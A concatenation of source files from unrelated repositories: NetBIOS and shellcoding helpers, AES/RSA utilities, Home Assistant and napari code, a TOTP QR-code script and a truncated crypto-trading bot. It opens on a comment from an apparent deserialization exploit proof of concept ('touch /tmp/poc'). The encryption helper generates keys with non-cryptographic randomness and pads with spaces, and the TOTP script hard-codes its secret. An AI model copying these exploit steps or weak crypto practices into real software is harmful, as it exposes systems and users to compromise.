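# is the serialized-map gadget that gets submitted to the vulnerable endpoint:
#   payload = prepare_payload('touch /tmp/poc')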
``` |
{
"source": "0x00-0x00/netbruter",
"score": 3
} |
#### File: netbruter/src/netbios.py
```python
from nmb.NetBIOSProtocol import NBNSProtocol, NetBIOSTimeout
class NetBiosDiscovery(object):
def __init__(self, address, port=137):
self.ip = address
self.port = port
self.nbns = NBNSProtocol()
def start(self):
try:
# Try to reach the server
response = self.nbns.queryIPForName(self.ip, port=self.port,
timeout=30)
except NetBIOSTimeout:
print("[!] Error: NetBIOS Name Service response timed out.")
return False
return response
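# Illustrative usage (a sketch; the address is hypothetical):
#   scanner = NetBiosDiscovery('192.168.1.10')
#   names = scanner.start()  # False on NetBIOSTimeout, the NBNS answer otherwise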
``` |
{
"source": "0x00-0x00/shellcoding",
"score": 3
} |
#### File: 0x00-0x00/shellcoding/project_setup.py
```python
import sys
# Default file with project data
default_file = "project.data"
# setup.py data
setup_data = """from setuptools import setup
setup(name='%s',
version='%s',
description='%s',
url='%s',
author='%s',
author_email='%s',
license='%s',
packages=['%s'],
package_dir={'%s': 'src'},
package_data={'%s': ['src/*']},
scripts=%s,
zip_safe=False)
"""
def parse_data(f):
data = dict()
# Open the file and get the uncommented data
with open(f, "r") as f:
for line in f.readlines():
if line[0] is "#" or len(line) < 2: # Ignore comments
continue
key, value = line.split("=")
data[key] = str(value.replace("\n", "")).replace('"', "'")
return data
def validate_data(data):
REQUIRED_OPTIONS = [
"PROJECT_NAME",
"PROJECT_VERSION",
"PROJECT_AUTHOR",
]
for k in data:
v = data[k]
# Check for empty data of required fields.
if v is "" and k in REQUIRED_OPTIONS:
print("[*] Validation error: {0} is empty.".format(k))
sys.exit(-1)
elif v is "":
print("[+] Setting value of key '{0}' to 'None'".format(k))
data[k] = "None"
return data
def main():
p = validate_data(parse_data(default_file))
print(setup_data % (
p["PROJECT_NAME"],
p["PROJECT_VERSION"],
p["PROJECT_DESCRIPTION"],
p["PROJECT_URL"],
p["PROJECT_AUTHOR"],
p["AUTHOR_EMAIL"],
p["PROJECT_LICENSE"],
p["PROJECT_PACKAGE"],
p["PROJECT_PACKAGE"],
p["PROJECT_PACKAGE"],
p["PROJECT_BINARIES"],
))
return 0
if __name__ == "__main__":
main()
```
#### File: shellcoding/src/hexdecode.py
```python
class HexDecode(object):
def __init__(self, data):
self.data = self._format_data(data)
@staticmethod
def _format_data(data):
data = data.replace("0x", "")
return data
def _convert(self):
hex_out = list()
for i in range(0, len(self.data), 2):
hex_out.append(int(self.data[i: i+2], 16))
return ''.join([chr(x) for x in hex_out])[::-1]
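# Illustrative usage (a sketch): "41424344" decodes to 'ABCD', which _convert()
# then reverses to 'DCBA' -- handy for little-endian constants in shellcode.
#   HexDecode("0x41424344")._convert()  # -> 'DCBA'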
``` |
{
"source": "0x00-0x00/shemutils",
"score": 3
} |
#### File: shemutils/src/encryption.py
```python
import os
import base64  # required by Key.get(encoded=True)
import time
import random
import hashlib
import getpass
import sys
import struct
import rsa
import multiprocessing
from Crypto.Cipher import AES
from shemutils.logger import Logger
class Key(object):
"""
Class Key written by shemhazai
This method generates a random key, unencoded or encoded in base64.
"""
def __init__(self, bits):
self.key_size = bits
if self._parse_bits() != 0:
self.key = None
else:
self.key = self._generate_key()
def _parse_bits(self):
"""Parse if the input int is divisible by 2"""
if self.key_size % 2 != 0:
return -1
return 0
def _generate_key(self):
"""Generate random bytes and join them into a single string"""
return ''.join(chr(random.randint(0, 0xFF)) for i in range(self.key_size))
def get(self, encoded=False):
"""
Method for returning the generated key
:param encoded: Boolean
:return: key string
"""
if encoded is True:
return base64.b64encode(self.key.encode('latin-1'))  # latin-1 preserves the raw 0-255 byte values
return self.key
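# Illustrative usage (a sketch): note that the 'bits' argument is used as a
# character count, so Key(16) yields a 16-character random string.
#   k = Key(16)
#   raw = k.get()              # raw key material
#   b64 = k.get(encoded=True)  # base64-encoded form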
class Encryption:
"""This module uses pycrypto for AES encryption"""
def __init__(self):
pass
@staticmethod
def create_iv():
iv = os.urandom(16)
return iv
@staticmethod
def hash256(string):
if type(string) is str:
return hashlib.sha256(string.encode()).digest()
else:
return hashlib.sha256(string).digest()
@staticmethod
def hash512(string):
if type(string) is str:
return hashlib.sha512(string.encode()).digest()
else:
return hashlib.sha512(string).digest()
@staticmethod
def hashmd5(string):
if type(string) is str:
return hashlib.md5(string.encode()).digest()
else:
return hashlib.md5(string).digest()
@staticmethod
def get_key(bits=256):
sys.stderr.write("Bit-size selected: %d\n" % bits)
k = str()
c = str("c")
while k != c:
if k == c:
break
k = getpass.getpass("Type your key: ", sys.stderr)
c = getpass.getpass("Confirm your key: ", sys.stderr)
if bits == 256:
sys.stderr.write("Generating 256-bit key ...\n")
return Encryption.hash256(k)
elif bits == 128:
sys.stderr.write("Generating 128-bit key ...\n")
return Encryption.hashmd5(k)
@staticmethod
def encrypt_file(file_name, key, iv, output=None, chunksize=64*1024):
if not output:
dire_name = os.path.dirname(file_name)
base_name = os.path.basename(file_name)
if dire_name != "":
output = dire_name + os.sep + base_name + ".enc"
else:
output = base_name + ".enc"
filesize = os.path.getsize(file_name)
encryptor = AES.new(key, AES.MODE_CBC, iv)
with open(file_name, "rb") as infile:
with open(output, "wb") as outfile:
outfile.write(struct.pack("<Q", filesize))
outfile.write(iv)
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += " ".encode() * (16 - len(chunk) % 16)
outfile.write(encryptor.encrypt(chunk))
return True
@staticmethod
def decrypt_file(file_name, key, output=None, chunksize=64*1024):
if not output:
root_name, ext = os.path.splitext(file_name)
if ext != ".enc":
return False
dir_name = os.path.dirname(root_name) + os.sep
f_name = os.path.basename(root_name)
if dir_name != "/":
output = dir_name + f_name
else:
output = f_name
with open(file_name, "rb") as infile:
origsize = struct.unpack("<Q", infile.read(struct.calcsize('Q')))[0]
iv = infile.read(16)
decryptor = AES.new(key, AES.MODE_CBC, iv)
with open(output, "wb") as outfile:
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
outfile.write(decryptor.decrypt(chunk))
outfile.truncate(origsize)
return True
@staticmethod
def get_chunk(msg, index, chunksize=16):
return msg[index:index+chunksize]
@staticmethod
def split_string(string, chunksize=16):
output = []
for x in range(0, len(string), chunksize):
part = Encryption.get_chunk(string, x, chunksize=chunksize)
if len(part) % 16 != 0:
part += " " * (16 - len(part) % 16)
output.append(part)
return output
@staticmethod
def encrypt_message(plaintext, key, iv):
"""
Function to encrypt a plaintext message.
Also checks if IV length is correct.
"""
psize = sys.getsizeof(plaintext)
if len(iv) != 16:
return "Error: Invalid IV size."
encryptor = AES.new(key, AES.MODE_CBC, iv)
cipher = bytes()
cipher += struct.pack("<Q", psize)
cipher += iv
for chunk in Encryption.split_string(plaintext):
cipher += encryptor.encrypt(chunk)
return cipher
@staticmethod
def decrypt_message(cipher, key):
"""
Function to decrypt data from input.
Also checks if IV length is correct.
"""
iv = cipher[struct.calcsize("Q"):struct.calcsize("3Q")]
if len(iv) != 16:
return "Error: Invalid IV size."
decryptor = AES.new(key, AES.MODE_CBC, iv)
plaintext = str()
for chunk in Encryption.split_string(cipher[struct.calcsize("3Q"):]):
plaintext += decryptor.decrypt(chunk).decode()
return plaintext
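# Illustrative round trip (a sketch; the passphrase is hypothetical). The
# plaintext is space-padded to a 16-byte boundary, hence the rstrip():
#   key = Encryption.hash256('hunter2')  # 32-byte key -> AES-256
#   iv = Encryption.create_iv()
#   cipher = Encryption.encrypt_message('secret', key, iv)
#   Encryption.decrypt_message(cipher, key).rstrip()  # -> 'secret'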
class RSA:
"""This class have dependencies.
multiprocessing, rsa modules are needed.
"""
def __init__(self):
self.logger = Logger("RSA")
self.public_key = None
self.private_key = None
self.cpu_count = multiprocessing.cpu_count()
def generate_keypair(self, bits=4096, v=True):
if v is not False:
self.logger.info("Generating new %d-bits key pair ..." % bits)
t1 = time.time()
self.public_key, self.private_key = rsa.newkeys(bits, poolsize=self.cpu_count)
t2 = time.time()
if v is not False:
self.logger.info("Key pair generation took {0} seconds.".format(t2-t1))
return True
def encrypt_message(self, message, v=False):
"""
:param message: string
:param v: boolean # stands for verbose
:return:
"""
if v is not False:
self.logger.info("Encrypting message ...")
s1 = time.time()
crypto = rsa.encrypt(message, self.public_key)
s2 = time.time()
if v is not False:
self.logger.info("Encryption success.")
self.logger.info("Procedure took {0} seconds.".format(s2-s1))
return crypto
def decrypt_message(self, cipher, v=False):
if v is not False:
self.logger.info("Decrypting cipher ...")
s1 = time.time()
decrypto = rsa.decrypt(cipher, self.private_key)
s2 = time.time()
if v is not False:
self.logger.info("Decryption success.")
self.logger.info("Procedure took %d seconds." % (s2 - s1))
return decrypto
def save_keys(self, priv_f="private_key.pem", pub_f="public_key.pem", v=False):
if self.public_key is None:
self.logger.error("Public Key does not exists. Generate it.")
return False
if self.private_key is None:
self.logger.error("Private Key does not exists. Generate it.")
return False
with open(priv_f, "w") as priv:
priv.write(self.private_key.save_pkcs1().decode())
self.logger.info("Private key saved to file '%s'" % priv_f)
with open(pub_f, "w") as pub:
pub.write(self.public_key.save_pkcs1().decode())
if v is True:
self.logger.info("Public key saved to file '%s" % pub_f)
return True
def load_keys(self, priv_f, pub_f, v=False):
if not os.path.isfile(priv_f):
self.logger.error("Private key file does not exists.")
if not os.path.isfile(pub_f):
self.logger.error("Public key file does not exists.")
with open(priv_f, "rb") as priv:
priv_data = priv.read()
with open(pub_f, "rb") as pub:
pub_data = pub.read()
self.private_key = rsa.PrivateKey.load_pkcs1(priv_data)
self.public_key = rsa.PublicKey.load_pkcs1(pub_data)
if v is True:
self.logger.info("Key pair successfully loaded.")
return True
``` |
{
"source": "0x00-0xFF/home-assistant",
"score": 2
} |
#### File: components/dsmr_reader/sensor.py
```python
import logging
from homeassistant.components import mqtt
from homeassistant.core import callback
from homeassistant.helpers.entity import Entity
from homeassistant.util import slugify
from .definitions import DEFINITIONS
_LOGGER = logging.getLogger(__name__)
DOMAIN = "dsmr_reader"
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up DSMR Reader sensors."""
sensors = []
for topic in DEFINITIONS:
sensors.append(DSMRSensor(topic))
async_add_entities(sensors)
class DSMRSensor(Entity):
"""Representation of a DSMR sensor that is updated via MQTT."""
def __init__(self, topic):
"""Initialize the sensor."""
self._definition = DEFINITIONS[topic]
self._entity_id = slugify(topic.replace("/", "_"))
self._topic = topic
self._name = self._definition["name"]
self._unit_of_measurement = (
self._definition["unit"] if "unit" in self._definition else ""
)
self._icon = self._definition["icon"] if "icon" in self._definition else None
self._transform = (
self._definition["transform"] if "transform" in self._definition else None
)
self._state = None
async def async_added_to_hass(self):
"""Subscribe to MQTT events."""
@callback
def message_received(message):
"""Handle new MQTT messages."""
if self._transform is not None:
self._state = self._transform(message.payload)
else:
self._state = message.payload
self.async_schedule_update_ha_state()
return await mqtt.async_subscribe(self.hass, self._topic, message_received, 1)
@property
def name(self):
"""Return the name of the sensor supplied in constructor."""
return self._name
@property
def entity_id(self):
"""Return the entity ID for this sensor."""
return f"sensor.{self._entity_id}"
@property
def state(self):
"""Return the current state of the entity."""
return self._state
@property
def unit_of_measurement(self):
"""Return the unit_of_measurement of this sensor."""
return self._unit_of_measurement
@property
def icon(self):
"""Return the icon of this sensor."""
return self._icon
``` |
{
"source": "0x006E/twweet-cli",
"score": 3
} |
#### File: twweet_cli/config/ConfigReader.py
```python
import yaml
import os
from os.path import expanduser
home = expanduser("~")
class ConfigurationReader(object):
__tweets = None
__hashtag = None
def __init__(self):
ymlfile = home + '/.twweet-cli/data/config.yml'
if os.path.isfile(ymlfile):
with open(ymlfile, 'r') as file:
cfg = yaml.safe_load(file)  # safe_load avoids arbitrary object construction
ConfigurationReader.__tweets = cfg['Tweets']
ConfigurationReader.__hashtag = cfg['HashTag']
else:
if not os.path.exists(home + '/.twweet-cli/data'):
os.makedirs(home + '/.twweet-cli/data')
with open(home + '/.twweet-cli/data/config.yml', 'w') as ymlfile:
ymlLine1 = "#Depending on the system(Windows or Linux) change the\
backward or forward slash appropriately."
ymlLine2 = "Tweets: /TweetsStore/"
ymlLine3 = "HashTag: /HashTagStore/"
ymlfile.write("%s\n%s\n%s\n" % (ymlLine1, ymlLine2, ymlLine3))
@staticmethod
def get_tweets_storage():
return ConfigurationReader.__tweets
@staticmethod
def get_hashtag_storage():
return ConfigurationReader.__hashtag
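# Illustrative usage (a sketch): instantiating once loads (or creates)
# ~/.twweet-cli/data/config.yml and fills the class-level paths.
#   ConfigurationReader()
#   tweets_dir = ConfigurationReader.get_tweets_storage()  # e.g. '/TweetsStore/'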
``` |
{
"source": "0x00b1/napari",
"score": 3
} |
#### File: napari/utils/notebook_display.py
```python
import base64
from io import BytesIO
__all__ = ['nbscreenshot']
class NotebookScreenshot:
"""Display napari screenshot in the jupyter notebook.
Functions returning an object with a _repr_png_() method
will displayed as a rich image in the jupyter notebook.
https://ipython.readthedocs.io/en/stable/api/generated/IPython.display.html
Parameters
----------
viewer : napari.Viewer
The napari viewer.
canvas_only : bool, optional
If True includes the napari viewer frame in the screenshot,
otherwise just includes the canvas. By default, True.
Examples
--------
```
import napari
from napari.utils import nbscreenshot
from skimage.data import chelsea
viewer = napari.view_image(chelsea(), name='chelsea-the-cat')
nbscreenshot(viewer)
# screenshot just the canvas with the napari viewer framing it
nbscreenshot(viewer, canvas_only=False)
```
"""
def __init__(self, viewer, *, canvas_only=False):
"""Initialize screenshot object.
Parameters
----------
viewer : napari.Viewer
The napari viewer
canvas_only : bool, optional
If False include the napari viewer frame in the screenshot,
and if True then take screenshot of just the image display canvas.
By default, False.
"""
self.viewer = viewer
self.canvas_only = canvas_only
self.image = None
def _repr_png_(self):
"""PNG representation of the viewer object for IPython.
Returns
-------
In memory binary stream containing PNG screenshot image.
"""
from imageio import imsave
from .._qt.qt_event_loop import get_app
get_app().processEvents()
self.image = self.viewer.screenshot(canvas_only=self.canvas_only)
with BytesIO() as file_obj:
imsave(file_obj, self.image, format='png')
file_obj.seek(0)
png = file_obj.read()
return png
def _repr_html_(self):
png = self._repr_png_()
url = 'data:image/png;base64,' + base64.b64encode(png).decode('utf-8')
html = f'<img src="{url}"></img>'
return html
nbscreenshot = NotebookScreenshot
```
#### File: napari/tools/test_strings.py
```python
import ast
import os
import tokenize
from pathlib import Path
from types import ModuleType
from typing import Dict, List, Optional, Set, Tuple
import pytest
from strings_list import (
SKIP_FILES,
SKIP_FOLDERS,
SKIP_WORDS,
SKIP_WORDS_GLOBAL,
)
REPO_ROOT = Path(__file__).resolve()
NAPARI_MODULE = (REPO_ROOT / "napari").relative_to(REPO_ROOT)
# Types
StringIssuesDict = Dict[str, List[Tuple[int, str]]]
OutdatedStringsDict = Dict[str, List[str]]
TranslationErrorsDict = Dict[str, List[Tuple[str, str]]]
class FindTransStrings(ast.NodeVisitor):
"""This node visitor finds translated strings."""
def __init__(self):
super().__init__()
self._found = set()
self._trans_errors = []
def _check_vars(self, method_name, args, kwargs):
"""Find interpolation variables inside a translation string.
This helps find any variables that need to be interpolated inside
a string so we can check against the `kwargs` for both singular
and plural strings (if present) inside `args`.
Parameters
----------
method_name : str
Translation method used. Options include "_", "_n", "_p" and
"_np".
args : list
List of arguments passed to translation method.
kwargs : kwargs
List of keyword arguments passed to translation method.
"""
singular_kwargs = set(kwargs) - set({"n"})
plural_kwargs = set(kwargs)
# If using trans methods with `context`, remove it since we are
# only interested in the singular and plural strings (if any)
if method_name in ["_p", "_np"]:
args = args[1:]
# Iterate on strings passed to the trans method. Could be just a
# singular string or a singular and a plural. We use the index to
# determine which one is used.
for idx, arg in enumerate(args):
found_vars = set()
check_arg = arg[:]
check_kwargs = {}
while True:
try:
check_arg.format(**check_kwargs)
except KeyError as err:
key = err.args[0]
found_vars.add(key)
check_kwargs[key] = 0
continue
break
if idx == 0:
check_1 = singular_kwargs - found_vars
check_2 = found_vars - singular_kwargs
else:
check_1 = plural_kwargs - found_vars
check_2 = found_vars - plural_kwargs
if check_1 or check_2:
error = (arg, check_1.union(check_2))
self._trans_errors.append(error)
def visit_Call(self, node):
method_name, args, kwargs = "", [], []
try:
if node.func.value.id == "trans":
method_name = node.func.attr
# Args
args = []
for item in [arg.value for arg in node.args]:
args.append(item)
self._found.add(item)
# Kwargs
kwargs = []
for item in [kw.arg for kw in node.keywords]:
if item != "deferred":
kwargs.append(item)
except Exception:
pass
if method_name:
self._check_vars(method_name, args, kwargs)
self.generic_visit(node)
def reset(self):
"""Reset variables storing found strings and translation errors."""
self._found = set()
self._trans_errors = []
show_trans_strings = FindTransStrings()
def _find_func_definitions(
node: ast.AST, defs: List[ast.FunctionDef] = []
) -> List[ast.FunctionDef]:
"""Find all functions definition recrusively.
This also find functions nested inside other functions.
Parameters
----------
node : ast.Node
The initial node of the ast.
defs : list of ast.FunctionDef
A list of function definitions to accumulate.
Returns
-------
list of ast.FunctionDef
Function definitions found in `node`.
"""
    # Guard against the mutable-default-argument pitfall: use a fresh list
    # per top-level call (recursive calls pass `defs` explicitly).
    if defs is None:
        defs = []
    try:
        body = node.body
    except Exception:
        body = []
for node in body:
_find_func_definitions(node, defs=defs)
if isinstance(node, ast.FunctionDef):
defs.append(node)
return defs
def find_files(
path: str,
skip_folders: tuple,
skip_files: tuple,
extensions: tuple = (".py",),
) -> List[str]:
"""Find recursively all files in path.
Parameters
----------
path : str
Path to a folder to find files in.
    skip_folders : tuple
        Folders to skip; any path containing one of these is ignored.
    skip_files : tuple
        Files to skip (matched by full path).
extensions : tuple, optional
Extensions to filter by. Default is (".py", )
Returns
-------
list
Sorted list of found files.
"""
found_files = []
for root, _dirs, files in os.walk(path, topdown=False):
for filename in files:
fpath = os.path.join(root, filename)
if any(folder in fpath for folder in skip_folders):
continue
if fpath in skip_files:
continue
if filename.endswith(extensions):
found_files.append(fpath)
return list(sorted(found_files))
def find_docstrings(fpath: str) -> Dict[str, str]:
"""Find all docstrings in file path.
Parameters
----------
fpath : str
File path.
Returns
-------
dict
        Simplified strings as keys; the values are the original docstrings
        found.
"""
with open(fpath) as fh:
data = fh.read()
module = ast.parse(data)
docstrings = []
function_definitions = _find_func_definitions(module)
docstrings.extend([ast.get_docstring(f) for f in function_definitions])
class_definitions = [
node for node in module.body if isinstance(node, ast.ClassDef)
]
docstrings.extend([ast.get_docstring(f) for f in class_definitions])
method_definitions = []
for class_def in class_definitions:
method_definitions.extend(
[
node
for node in class_def.body
if isinstance(node, ast.FunctionDef)
]
)
docstrings.extend([ast.get_docstring(f) for f in method_definitions])
docstrings.append(ast.get_docstring(module))
docstrings = [doc for doc in docstrings if doc]
results = {}
for doc in docstrings:
key = " ".join([it for it in doc.split() if it != ""])
results[key] = doc
return results
def find_strings(fpath: str) -> Dict[Tuple[int, str], Tuple[int, str]]:
"""Find all strings (and f-strings) for the given file.
Parameters
----------
fpath : str
File path.
Returns
-------
    dict
        A dict keyed by (line number, stripped string) tuples; each value is
        a (line number, original string) tuple.
"""
strings = {}
with open(fpath) as f:
for toktype, tokstr, (lineno, _), _, _ in tokenize.generate_tokens(
f.readline
):
if toktype == tokenize.STRING:
                try:
                    string = eval(tokstr)
                except Exception:
                    # f-strings cannot be eval'd directly (their names are
                    # unbound here), so drop the `f` prefix and evaluate the
                    # remaining literal
                    string = eval(tokstr[1:])
if isinstance(string, str):
key = " ".join([it for it in string.split() if it != ""])
strings[(lineno, key)] = (lineno, string)
return strings
def find_trans_strings(
fpath: str,
) -> Tuple[Dict[str, str], List[Tuple[str, Set[str]]]]:
"""Find all translation strings for the given file.
Parameters
----------
fpath : str
File path.
Returns
-------
tuple
        The first item is a dict with a stripped string as key and the
        original string as value. The second item is a list of tuples
        describing errors found in translations.
"""
with open(fpath) as fh:
data = fh.read()
module = ast.parse(data)
trans_strings = {}
show_trans_strings.visit(module)
for string in show_trans_strings._found:
key = " ".join([it for it in string.split()])
trans_strings[key] = string
errors = list(show_trans_strings._trans_errors)
show_trans_strings.reset()
return trans_strings, errors
def import_module_by_path(fpath: str) -> Optional[ModuleType]:
"""Import a module given py a path.
Parameters
----------
fpath : str
The path to the file to import as module.
Returns
-------
ModuleType or None
The imported module or `None`.
"""
import importlib.util
fpath = fpath.replace("\\", "/")
module_name = fpath.replace(".py", "").replace("/", ".")
try:
spec = importlib.util.spec_from_file_location(module_name, fpath)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
except Exception:
module = None
return module
def find_issues(
paths: List[str], skip_words: List[str]
) -> Tuple[StringIssuesDict, OutdatedStringsDict, TranslationErrorsDict]:
"""Find strings that have not been translated, and errors in translations.
    This does not raise on problems; instead it returns the issues found so
    they can all be fixed at once.
Parameters
----------
paths : list of str
List of paths to files to check.
skip_words : list of str
List of words that should be skipped inside the given file.
Returns
-------
tuple
The first item is a dictionary of the list of issues found per path.
Each issue is a tuple with line number and the untranslated string.
The second item is a dictionary of files that contain outdated
skipped strings. The third item is a dictionary of the translation
        errors found per path. Translation errors refer to missing
        interpolation variables, or spelling errors of the `deferred` keyword.
"""
issues = {}
outdated_strings = {}
trans_errors = {}
for fpath in paths:
issues[fpath] = []
strings = find_strings(fpath)
trans_strings, errors = find_trans_strings(fpath)
doc_strings = find_docstrings(fpath)
skip_words_for_file = skip_words.get(fpath, [])
skip_words_for_file_check = skip_words_for_file[:]
module = import_module_by_path(fpath)
try:
__all__strings = module.__all__
except Exception:
__all__strings = []
for key in strings:
_lineno, string = key
_lineno, value = strings[key]
if (
string not in doc_strings
and string not in trans_strings
and value not in skip_words_for_file
and value not in __all__strings
and string != ""
and string.strip() != ""
and value not in SKIP_WORDS_GLOBAL
):
issues[fpath].append((_lineno, value))
elif value in skip_words_for_file_check:
skip_words_for_file_check.remove(value)
if skip_words_for_file_check:
outdated_strings[fpath] = skip_words_for_file_check
if errors:
trans_errors[fpath] = errors
if not issues[fpath]:
issues.pop(fpath)
return issues, outdated_strings, trans_errors
# --- Fixture
# ----------------------------------------------------------------------------
@pytest.fixture(scope="module")
def checks():
paths = find_files(NAPARI_MODULE, SKIP_FOLDERS, SKIP_FILES)
issues, outdated_strings, trans_errors = find_issues(paths, SKIP_WORDS)
return issues, outdated_strings, trans_errors
# --- Tests
# ----------------------------------------------------------------------------
def test_missing_translations(checks):
issues, _, _ = checks
print(
"\nSome strings on the following files might need to be translated "
"or added to the skip list.\nSkip list is located at "
"`tools/strings_list.py` file.\n\n"
)
for fpath, values in issues.items():
print(f"{fpath}\n{'*' * len(fpath)}")
unique_values = set()
for line, value in values:
unique_values.add(value)
print(f"{line}:\t{repr(value)}")
print("\n")
if fpath in SKIP_WORDS:
            print(
                f"List below can be copied directly to `tools/strings_list.py` file inside the '{fpath}' key:\n"
            )
for value in sorted(unique_values):
print(f" {repr(value)},")
else:
print(
"List below can be copied directly to `tools/strings_list.py` file:\n"
)
print(f" {repr(fpath)}: [")
for value in sorted(unique_values):
print(f" {repr(value)},")
print(" ],")
print("\n")
no_issues = not issues
assert no_issues
def test_outdated_string_skips(checks):
_, outdated_strings, _ = checks
print(
"\nSome strings on the skip list on the `tools/strings_list.py` are "
"outdated.\nPlease remove them from the skip list.\n\n"
)
for fpath, values in outdated_strings.items():
print(f"{fpath}\n{'*' * len(fpath)}")
print(", ".join(repr(value) for value in values))
print("")
no_outdated_strings = not outdated_strings
assert no_outdated_strings
def test_translation_errors(checks):
_, _, trans_errors = checks
print(
"\nThe following translation strings do not provide some "
"interpolation variables:\n\n"
)
for fpath, errors in trans_errors.items():
print(f"{fpath}\n{'*' * len(fpath)}")
for string, variables in errors:
print(f"String:\t\t{repr(string)}")
print(
f"Variables:\t{', '.join(repr(value) for value in variables)}"
)
print("")
print("")
no_trans_errors = not trans_errors
assert no_trans_errors
``` |
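The `_check_vars` method above discovers interpolation variables by repeatedly calling `str.format` and harvesting the missing key from each `KeyError`. A standalone sketch of that probing trick (the function name and template are illustrative):
```python
def format_vars(template: str) -> set:
    """Collect every named interpolation variable in a format template."""
    found, kwargs = set(), {}
    while True:
        try:
            template.format(**kwargs)
        except KeyError as err:
            key = err.args[0]
            found.add(key)
            kwargs[key] = 0   # dummy value so the next pass gets further
            continue
        break
    return found

assert format_vars("Loaded {n_layers} layers from {path}") == {"n_layers", "path"}
```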
{
"source": "0x00C0DE/cs370-proj4-qr-totp",
"score": 3
} |
#### File: 0x00C0DE/cs370-proj4-qr-totp/leebrad-MP4.py
```python
import os
import sys
import pyqrcode
import getpass
import random
import base64
import hmac
import string
import hashlib
import time
import math
import struct
import array
# function to generate qr code svg
def create_qrcode():
#creates user id
username = 'braden.lee96'
user_email = username + "@gmail.com"
#print(user_email)
    # static secret to make testing easier; [:-6] strips the six '='
    # padding characters that a 16-byte input produces in base32
    secret = base64.b32encode(bytearray("BIGONEBUYNOWSAVE", "ascii")).decode('utf-8')[:-6]
#print(secret)
# Uri format
#url = 'otpauth://totp/' + '0x00C0DE' + ':' + user_email + '?secret=' + secret + '&issuer=' + '0x00C0DE'
    url = 'otpauth://totp/' + 'smallmediumpizza' + ':' + user_email + '?secret=' + secret + '&issuer=' + 'smallmediumpizza'
#print(url)
# function to actually generate the qr
url_qrcode = pyqrcode.create(url)
# saves the qr as a svg image name "uri_qrcode.svg"
url_qrcode.svg("uri_qrcode.svg", scale="8")
return
# function to generate totp
def create_otp():
# epoch time
c_timer = math.floor(time.time())
    # counter variable for 30-second time steps
steps_thirty = 30
Time_counter = int((c_timer/steps_thirty))
t_c = Time_counter
#print("timer counter:", Time_counter)
# convert time to bytes
byte_arr = array.array('B')
for i in reversed(range(0, 8)):
# (AND) with 1111 1111 to leave the last 8 bits
byte_arr.insert(0, t_c & 0b11111111)
# perform bit shift by 8 places
t_c >>= 8
# Time converted to bytes
Time_bytes = byte_arr
#print("Time_bytes: ", Time_bytes)
# static secret to bytes
secret = bytearray("BIGONEBUYNOWSAVE", "ascii")
# hmac generation
qr_otp = hmac.new(secret, Time_bytes, hashlib.sha1).hexdigest()
# convert to binary and take last 4 bits to use as the offset(int)
bitstring = bin(int(qr_otp, 16))
last_4_bits = bitstring[-4:]
qr_offset = int(last_4_bits, 2)
# grabs the next 31 bits needed using (AND) with bitmask 01111111 11111111 11111111 11111111
binary_otp = int(qr_otp[(qr_offset * 2):((qr_offset * 2) + 8)], 16) & 0b01111111111111111111111111111111
    # take the last 6 digits as the TOTP (mod 10^6, zero-padded per RFC 4226;
    # plain string slicing would drop leading zeros)
    dig_6 = str(binary_otp % 10 ** 6).zfill(6)
print("dig_6 is: ", dig_6)
return
# arg checker
if len(sys.argv) == 1:
print("[ERROR]")
print("not enough args.lol")
print("[ERROR]")
else:
first_arg = sys.argv[1]
print("first arg is:", first_arg)
if first_arg == '--generate-qr':
print("in [generate qr]")
create_qrcode()
if first_arg == "--get-otp":
print("in [get otp]")
create_otp()
print("done")
``` |
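For comparison, the manual byte loop and hex-string truncation above can be cross-checked against a compact RFC 6238 implementation built on `struct.pack`. This sketch reuses the script's hard-coded secret and 30-second step (the function name is illustrative):
```python
import hashlib
import hmac
import struct
import time

def totp_sha1(secret: bytes, step: int = 30, digits: int = 6) -> str:
    counter = int(time.time()) // step
    msg = struct.pack(">Q", counter)            # 8-byte big-endian counter
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                  # dynamic truncation (RFC 4226)
    code = int.from_bytes(digest[offset:offset + 4], "big") & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# Should match dig_6 printed by create_otp() within the same 30-second window
print(totp_sha1(b"BIGONEBUYNOWSAVE"))
```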
{
"source": "0x00C0DE/robinhood_crypto_bot",
"score": 3
} |
#### File: 0x00C0DE/robinhood_crypto_bot/rh_DOGE_bot_2021_v1.py
```python
import robin_stocks
import math
import pyotp
import sched
import time
import sys
# Program description:
# A Robinhood bot created to automatically monitor and trade crypto currency currently supported by Robinhood.
# Works specifically for DOGE.
#
# This bot runs a scheduler every 5 minutes in order to update the prices on a 5 minute interval for a
# list that will hold the previous prices for 30 minutes.
#
# This bot [REQUIRES] an individual to already have a SET amount of shares of the crypto they want to trade.
#
# Instructions after entering in login information (no particular order):
#
# 1. Fill in ticker (since this bot is specifically for DOGE, should be left alone)
# 2. Fill in average_cost
# 3. Fill in Shares2Buy amount (in dollars $)
# 4. Fill in Shares2Sell amount (in dollars $)
# 5. Fill in num_shares
#
# Some buying and selling errors will occur if an individual does not have enough shares to sell or enough money to buy.
# If errors occur, simply redo the instructions above and restart the program.
# Robinhood.login(username="example72", password="<PASSWORD>")
totp = pyotp.TOTP("Sauce").now()
# NOTE: the generated TOTP is never passed to login below; robin_stocks
# accepts it via the mfa_code keyword if two-factor auth is enabled
login = robin_stocks.login("", "")
# Scheduler created to run every 5 mins
s = sched.scheduler(time.time, time.sleep)
# 5 min interval price history list, for every 30 minutes
SE3P = []
Mazda = []
counter1 = 1.0
counter2 = 1.0
Shares2Sell = 0.00
Shares2Buy = 0.00
# step (5)
# number of shares based on (total cost / Shares2Buy)
# EX: ($2940 / 20) = 147
num_shares = 147
# step (2)
# average cost
average_cost = 0.363
def run(sc):
# crypto currency ticker available on robinhood
ticker = "DOGE"
global SE3P
global Mazda
global Shares2Sell
global Shares2Buy
global counter1
global counter2
global average_cost
global num_shares
r = robin_stocks.crypto.get_crypto_quote(ticker, info="mark_price")
#r = robin_stocks.robinhood.get_latest_price(ticker)
print(ticker + ": $" + str(r))
SE3P.append(r)
if len(SE3P) > 6:
        # keep a sliding window of the 6 most recent prices (30 minutes):
        # drop the oldest entry and keep the latest
Mazda = SE3P[1:6]
SE3P = SE3P[-1:]
SE3P = Mazda + SE3P
print("Cleared and repositioned")
if len(SE3P) == 1:
#0min
print("appended SE3P[0]")
print(SE3P)
elif len(SE3P) == 2:
